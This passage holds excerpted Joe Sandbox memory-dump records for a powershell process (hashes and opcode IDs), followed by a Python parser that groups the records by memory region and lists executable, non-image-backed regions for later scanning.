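      • Instruction Fuzzy Hash: 4A01F936F1DE1A4FFAE9931C15A51BC91D6DF85622B5D91BED91EC3386DC0CEC100681
      Uniqueness

      Uniqueness Score: -1.00%

      Memory Dump Source
      • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: c0a1837f2d91ee6f6ee65dfdfdea5868d2b03cc674f5dfa5a4bc02074d39fd24
      • Instruction ID: b9f1ef7fa4f19f999cc62016c4554a4a4f596b29f24f00a2e1817c74c2956bf8
      • Opcode Fuzzy Hash: c0a1837f2d91ee6f6ee65dfdfdea5868d2b03cc674f5dfa5a4bc02074d39fd24
      • Instruction Fuzzy Hash: 89F0653276CA084FD75C9A0CF8429B5B3D5E78A325B40417EE4CFC2287E917F8468685
      Uniqueness

      Uniqueness Score: -1.00%

      Non-executed Functions

      Memory Dump Source
      • Source File: 00000005.00000002.347815999.00007FFA16250000.00000040.00000001.sdmp, Offset: 00007FFA16250000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_5_2_7ffa16250000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: cd3d42588d333d51cc6ae8c5fe7c58048554c2d5f85a7889ca4489a9718e3d73
      • Instruction ID: 585369e4197ee494f01e5596718ced3ac2fa7da140060cb3142b6c05eb302a57
      • Opcode Fuzzy Hash: cd3d42588d333d51cc6ae8c5fe7c58048554c2d5f85a7889ca4489a9718e3d73
      • Instruction Fuzzy Hash: 1BB12731E1CA5A4FD338DB58D4446F1B7D0EF46325B25D5BEC48EC7682DA29B842CB80
      Uniqueness

      Uniqueness Score: -1.00%
"""

FIELD_RE = re.compile(r"^([A-Za-z ]+?):\s*(.*)$")
# Assumption: <pid>.<dump type>.<id>.<base address>.<protection>.<type>.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]+)\."
    r"([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass
class FunctionRecord:
    executed: bool
    source_file: str
    offset: int
    based_on_pe: bool
    snapshot_file: str
    opcode_id: str
    instruction_id: str
    instruction_fuzzy_hash: str
    uniqueness_score: float
    pid: int
    base_address: int
    protection: int


def decode_sdmp_name(name: str) -> tuple[int, int, int]:
    """Return (pid, base_address, protection) decoded from a .sdmp file name."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"unrecognised sdmp name: {name}")
    return int(m.group(1), 16), int(m.group(4), 16), int(m.group(5), 16)


def _build(f: dict[str, str], executed: bool) -> FunctionRecord:
    pid, base, prot = decode_sdmp_name(f["source file"])
    return FunctionRecord(
        executed=executed,
        source_file=f["source file"],
        offset=int(f["offset"], 16),
        based_on_pe=f.get("based on pe", "").lower() == "true",
        snapshot_file=f.get("snapshot file", ""),
        opcode_id=f.get("opcode id", ""),
        instruction_id=f.get("instruction id", ""),
        instruction_fuzzy_hash=f.get("instruction fuzzy hash", ""),
        uniqueness_score=float(f.get("uniqueness score", "0").rstrip("%")),
        pid=pid, base_address=base, protection=prot,
    )


def parse_records(text: str) -> list[FunctionRecord]:
    """Parse every 'Memory Dump Source' block; blocks after the
    'Non-executed Functions' header are marked executed=False."""
    records: list[FunctionRecord] = []
    current: dict[str, str] | None = None
    executed = True

    def flush() -> None:
        if current is not None:
            records.append(_build(current, executed))

    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()   # drop indentation and bullet
        if not line:
            continue
        if line == "Non-executed Functions":
            flush(); current = None; executed = False
            continue
        if line == "Memory Dump Source":
            flush(); current = {}
            continue
        if current is None:
            continue
        # The Source File line packs three fields: split only before "Key:".
        for part in re.split(r",\s+(?=[A-Za-z][A-Za-z ]*:)", line):
            m = FIELD_RE.match(part)
            if m:
                current[m.group(1).strip().lower()] = m.group(2).strip()
    flush()
    return records


def functions_by_region(records: list[FunctionRecord]) -> dict[int, list[FunctionRecord]]:
    out: dict[int, list[FunctionRecord]] = defaultdict(list)
    for r in records:
        out[r.base_address].append(r)
    return dict(out)


def rwx_non_pe_regions(records: list[FunctionRecord]) -> list[int]:
    """Base addresses of dumps that are RWX and not image-backed: the regions
    worth carving and scanning first, since no on-disk module explains them."""
    return sorted({r.base_address for r in records
                   if r.protection == PAGE_EXECUTE_READWRITE and not r.based_on_pe})


def summarize(records: list[FunctionRecord]) -> dict:
    return {
        "functions": len(records),
        "executed": sum(r.executed for r in records),
        "non_executed": sum(not r.executed for r in records),
        "regions": len(functions_by_region(records)),
        "unique_opcode_ids": len({r.opcode_id for r in records}),
        "rwx_non_pe_regions": [hex(a) for a in rwx_non_pe_regions(records)],
    }


if __name__ == "__main__":
    for key, val in summarize(parse_records(SAMPLE)).items():
        print(f"{key}: {val}")
```

Feed the whole exported report to `parse_records` instead of `SAMPLE` to get one record per function; `rwx_non_pe_regions` then lists the dump base addresses to pull out of the sandbox for scanning, and `functions_by_region` shows how many fingerprinted functions each region contributed.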